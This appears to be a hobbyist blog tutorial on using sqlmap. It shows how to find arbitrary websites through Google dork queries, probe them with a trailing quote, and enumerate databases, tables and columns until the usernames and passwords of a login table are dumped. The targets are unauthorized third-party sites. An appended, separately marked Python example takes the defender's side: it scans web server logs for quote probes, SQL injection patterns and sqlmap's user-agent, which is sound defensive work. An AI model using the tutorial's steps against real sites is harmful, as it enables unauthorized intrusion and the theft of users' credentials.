SQLiMAP

4:17 AM Vince Donguines 0 Comments

Here is a fast TUT on SQLmap, kinda crappy TUT but hope it helps.
(1) Pick a target by Google searching one of these:
inurl:index.php?id=1
inurl:trainers.php?id=1
inurl:buy.php?category=1
inurl:article.php?ID=1
inurl:play_old.php?id=1
inurl:declaration_more.php?decl_id=1
inurl:pageid=1
inurl:games.php?id=1
(2) click on a website and test if you can do a SQLI by adding a ' at the end of the URL.
You should get an error; if you don't, move on.
EX.. https://www.targetsite.com/page.php?id=1'
(3) then copy the URL without the ' and open sqlmap
(4) sqlmap -u https://www.targetsite.com/page.php?id=1 --dbs
(5) it should show you the available databases and how many. Now pick the one
you want to open first. Let's say there are 2 databases: boobies (the first one)
and vizio (the second one).
(6) sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies --tables
-D is the database and --tables lists what you can open inside it
(7) it should open that database up and show you all the tables. Let's say there are 3 tables:
es_cms_news
es_cms_login
es_cms_users
now find the ones named users and login (of course) and copy and paste the ones you want into a
text editor ..... es_cms_login es_cms_users
(8) Now to open the columns, type:
sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies -T es_cms_login --columns
-T is for the table; paste the one you wanna open, then --columns
(9) now you might see something like this:
columns  | types
---------+---------
cookies  | char(32)
password | char(31)
username | char(20)
now let's get the usernames and passwords :D
(10) sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies -T es_cms_login -C username --dump
-C is for what column you want; paste what you wanna open, in this case username, then --dump,
which basically dumps everything in front of you.
(11) then woot woot, look, you should see all the usernames:
|username|
------
admin (admin is the username)
sexybetty
(12) let's get the passwords. Same table as before, but with -C password this time:
sqlmap -u https://www.targetsite.com/page.php?id=1 -D boobies -T es_cms_login -C password --dump
then you should get something like this:
|password|
------
bigpappa
sweatynuts
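From the defender's side, the probes in this TUT (the trailing ' on the id parameter and sqlmap's own User-Agent) are easy to spot in the web server's access log. This is an added example, not part of the original post: a small Python scanner over constructed Apache-style log lines; the IPs, timestamps, paths and the sqlmap version string are all made up.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache-style access log lines (not real traffic): a normal request,
# a quote probe (id=1') answered with a 500, a boolean probe sent with a
# sqlmap-style User-Agent, and an unrelated normal request.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /page.php?id=1' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /page.php?id=1%20AND%201%3D1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
198.51.100.9 - - [10/Oct/2023:13:57:10 +0000] "GET /article.php?ID=42 HTTP/1.1" 200 4098 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Signatures of the probes a manual tester or sqlmap sends to a numeric id parameter.
SQLI_PATTERNS = re.compile(r"""(?ix)
    ['"]                             # lone quote probe, e.g. id=1'
  | \b(?:and|or)\b\s+\d+\s*=\s*\d+   # boolean probe, e.g. 1 AND 1=1
  | \bunion\b.*?\bselect\b           # union-based probe
  | \b(?:sleep|benchmark)\s*\(       # time-based probe
  | --\s*$ | /\* | \#\s*$            # comment terminators
""")

def classify(line):
    """Parse one log line; None if unparsable, else a dict with a list of reasons."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    # parse_qs already percent-decodes, so %20AND%201%3D1 becomes " AND 1=1"
    params = parse_qs(urlparse(m["path"]).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:
            if SQLI_PATTERNS.search(value):
                reasons.append(f"suspicious value in {name!r}: {value!r}")
    if reasons and m["status"] == "500":
        reasons.append("server error on probe: the page may be leaking DB errors")
    return {"ip": m["ip"], "path": m["path"], "status": m["status"], "reasons": reasons}

def flag_requests(log_text):
    """Return the parsed entries that carry at least one reason, in log order."""
    return [r for r in map(classify, log_text.splitlines()) if r and r["reasons"]]
```

A 500 on the quote probe is the same signal the TUT tells the attacker to look for, so it is also the cue to switch the page to parameterized queries and turn off verbose database errors.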
